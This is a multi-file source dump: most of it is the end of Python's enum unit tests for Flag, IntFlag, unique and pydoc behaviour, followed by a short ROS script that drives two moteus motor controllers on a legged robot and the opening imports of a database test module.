self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.PURPLE), [Color.BLUE, Color.RED])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
name = "TestFlag.test_cascading_failure.<locals>.Bizarre"
self.assertRaisesRegex(ValueError, "5 is not a valid " + name, Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid " + name, Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid " + name, Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid " + name, Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid " + name, Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid " + name, Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.PURPLE), [Color.BLUE, Color.RED])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
|
actuator_controller.py
|
#!/usr/bin/python3 -B
import time
import math
from aoyun_fdcanusb.moteusController import Controller
from aoyun_fdcanusb.moteusReg import MoteusReg
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import JointState
import threading
def thread_job():
rospy.spin()
positions = [0 for _ in range(12)]
def save_position(data):
global positions
for i in range(12):
positions[i] = (data.position[i] / math.pi)
# rospy.loginfo('positions[%d]: %f; data.position[%d] %f', i, positions[i], i, data.position[i])
def listener():
rospy.init_node('ayspot_a1_hw_pylistener', anonymous=True)
add_thread = threading.Thread(target = thread_job)
add_thread.start()
rospy.Subscriber('/joint_states', JointState, save_position, queue_size=1)
rospy.sleep(1)
def main():
global positions
# controller_hip_lf = Controller(controller_ID = 3)
# controller_thigh_lf = Controller(controller_ID = 1)
# controller_shank_lf = Controller(controller_ID = 2)
# controller_hip_rf = Controller(controller_ID = 6)
controller_thigh_rf = Controller(controller_ID = 4)
controller_shank_rf = Controller(controller_ID = 5)
# controller_hip_lh = Controller(controller_ID = 9)
# controller_thigh_lh = Controller(controller_ID = 7)
# controller_shank_lh = Controller(controller_ID = 8)
# controller_hip_rh = Controller(controller_ID = 12)
# controller_thigh_rh = Controller(controller_ID = 10)
# controller_shank_rh = Controller(controller_ID = 11)
listener()
jump_torque = 2
freq = 200
while True:
# hip_lf = positions[0]
# thigh_lf = positions[1]
# shank_lf = positions[2]
# hip_rf = positions[3]
thigh_rf = positions[4] - (0.25214188/2.0)
shank_rf = positions[5]
# hip_lh = positions[6]
# thigh_lh = positions[7]
# shank_lh = positions[8]
# hip_rh = positions[9]
# thigh_rh = positions[10]
# shank_rh = positions[11]
freq_measure_time = time.time()
phase = (time.time()*1) % (2. *math.pi)
# controller_hip_lf.set_position(position=hip_lf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_thigh_lf.set_position(position=thigh_lf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_shank_lf.set_position(position=shank_lf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_hip_rf.set_position(position=hip_rf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
controller_thigh_rf.set_position(position=thigh_rf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
controller_shank_rf.set_position(position=shank_rf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_hip_lh.set_position(position=hip_lh, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_thigh_lh.set_position(position=thigh_lh, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_shank_lh.set_position(position=shank_lh, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_hip_rh.set_position(position=positions[9], max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_thigh_rh.set_position(position=positions[10], max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_shank_rh.set_position(position=positions[11], max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
sleep = (1/(freq)) - (time.time() - freq_measure_time)
if (sleep < 0): sleep = 0
time.sleep(sleep)
if __name__=='__main__':
main()
|
base_test_rqg.py
|
import paramiko
from basetestcase import BaseTestCase
import os
import zipfile
import queue
import json
import threading
from memcached.helper.data_helper import VBucketAwareMemcached
from .rqg_mysql_client import RQGMySQLClient
